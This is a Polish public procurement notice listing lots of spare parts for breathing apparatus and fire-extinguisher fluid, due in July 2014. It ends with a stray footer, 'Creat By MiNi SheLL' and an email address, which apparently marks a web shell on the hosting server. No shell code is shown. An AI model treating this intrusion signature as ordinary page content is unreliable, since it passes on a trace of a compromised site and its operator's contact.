<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa części zamiennych do aparatu SABRE CENTURION.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1ZESTAW NAPRAWCZY PO 6 LATACH	950.52.00-szt.	20
 
Zamawiający nie dopuszcza stosowania współzamienników.  Stosowania współzamienników nie dopuszcza dokumentacja technologiczna i serwisowa (będąca w posiadaniu Zamawiającego) - ze względu na zakłócenia parametrów technicznych sprzętu, zagrożenia bezpieczeństwa życia oraz utratę wszystkich gwarancji  i uprawnień serwisowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa części zamiennych do aparatu FASER APS2, FASER APAS3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1MASKA TWARZOWA PANORAMICZNA MT 848-szt.50
2PŁYTKA ZAWORU APS2/2-50 FASER 562G5-szt.50
3PŁATEK ZAWORU WYDECHOWEGO MASKI MT848 JADZIA	-szt.100
4ZAWÓR WYDECHOWY -szt.	100
5ŁĄCZNIK KOMPLETNY MASKI-szt.30
6ZESTAW NAPRAWCZY AUTOMATU PODCIŚ.-szt.100
7USZCZELKA PROFILOWANA	-szt.200
8USZCZELKA (DO GWIZDKA)	-szt.200
9KORPUS KOMPLETNY-szt.	30
10ZAWÓR -szt.	20
11TRZPIEŃ-szt.	20
12KORPUS-szt.	20
13SPRĘŻYNA-szt.	20
14WKRĘTKA-szt.	20
15WKRĘT DOCISKOWY M3x6-Ms-szt.	20
16KIEROWNICA-szt.	20
17WKRĘT DO BLACH C2,2x6,5-szt.	40
           
Zamawiający nie dopuszcza stosowania współzamienników. Stosowania współzamienników nie dopuszcza dokumentacja technologiczna i serwisowa (będąca w posiadaniu Zamawiającego) - ze względu na zakłócenia parametrów technicznych sprzętu, zagrożenia bezpieczeństwa życia oraz utratę wszystkich gwarancji i uprawnień serwisowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa części zamiennych do aparatu AUER.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1PIERSCIEŃ O-RING-szt.	100
2MEMBRANA -szt.	70
3PIERŚCIEŃ DYSTANSOWY-szt.	50
4PIERSCIEN O-RING HP DM04 -szt.	20
5PIERSCIEN O-RING IP DM04-szt.	20
6MASKA ULTRA ELITE PS-szt.	30
7PŁYTKA ZAWORU WYDECHOWEGO   P Elite-szt.	50
8SMAR SILIKONOWY MOLIKOTE MEDIUM (100g)	-szt.	15
9ZESTAW DO  NAPRAWY GŁÓWNEJ REDUKTORA	-szt.	30
NARZĘDZIA DO EKSPOATACJI			
10KLUCZ DYNAMOMETRYCZNY 2-25NM-szt.	4
11SZCZYPCE ROZSTAWNE Z PLASTIKOWYMI NAKŁADKAMI -szt.	3
12KLUCZ KOŁKOWY DO DM04-szt.	3
13KLUCZ DWUSTRONNY DO LA88/96 AE/AS-szt.	3
14KLUCZ JEDNOSTRONNY DO LA88/96N-szt.	3
15SMAR GLEITMO 595-szt.	5
16WTYKOWA GRZECHOTKA DWUKIERUNKOWA 9x12 3/8-szt.2

Zamawiający nie dopuszcza stosowania współzamienników. Stosowania współzamienników nie dopuszcza dokumentacja technologiczna i serwisowa (będąca w posiadaniu Zamawiającego) - ze względu na zakłócenia parametrów technicznych sprzętu, zagrożenia bezpieczeństwa życia oraz utratę wszystkich gwarancji i uprawnień serwisowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa części zamiennych do aparatu FENZY AIR 5500, FENZY AERIS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1ZESTAW NAPRAWCZY -kpl.	20
2PIERŚCIEŃ O-RING 9x2 -szt.	20
3PIERSCIEŃ O-RING 11x2,5 -szt.	50
4PIERSCIEŃ O-RING 7x2 -szt.	50
5PIERŚCIEŃ O-RING 11x2 -szt.	20
6ZESTAW NAPRAWCZY -kpl.	20
7ZESTAW NAPRAWCZY -kpl.	5
8ZESTAW NAPRAWCZY APARATU ODDECHOWEGO FENZY SX-PRO	-kpl.	2
9ZESTAW DO ŁACZNIKA EN 200/300-kpl.	60

Zamawiający nie dopuszcza stosowania współzamienników. Stosowania współzamienników nie dopuszcza dokumentacja technologiczna i serwisowa (będąca w posiadaniu Zamawiającego) - ze względu na zakłócenia parametrów technicznych sprzętu, zagrożenia bezpieczeństwa życia oraz utratę wszystkich gwarancji i uprawnień serwisowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa części zamiennych do gaśnicy hiperbarycznej HYFEX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1PŁYN GAŚNICZY HY-FEX SE 4816-szt.	15
2PŁYN DO GAŚNICY HY-FEX SE 4817-szt.	10

Zamawiający dopuszcza rozwiązania równoważne normom, aprobatom, specyfikacjom technicznym i systemom odniesienia, o których mowa w art. 30 ust. 1÷3 ustawy Prawo zamówień publicznych. Wykonawca powołujący się na te rozwiązania jest zobowiązany wykazać w ofercie, że oferowane przez niego dostawy spełniają wszystkie wymagania określone przez Zamawiającego.
Zamawiający dopuszcza możliwość dostarczenia asortymentu równoważnego do płynów gaśniczych wskazanych w zadaniu nr 7, tzn. o nie gorszych (tożsamych) właściwościach i składzie chemicznym. Zaoferowany produkt równoważny musi być co najmniej tożsamy funkcjonalnie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com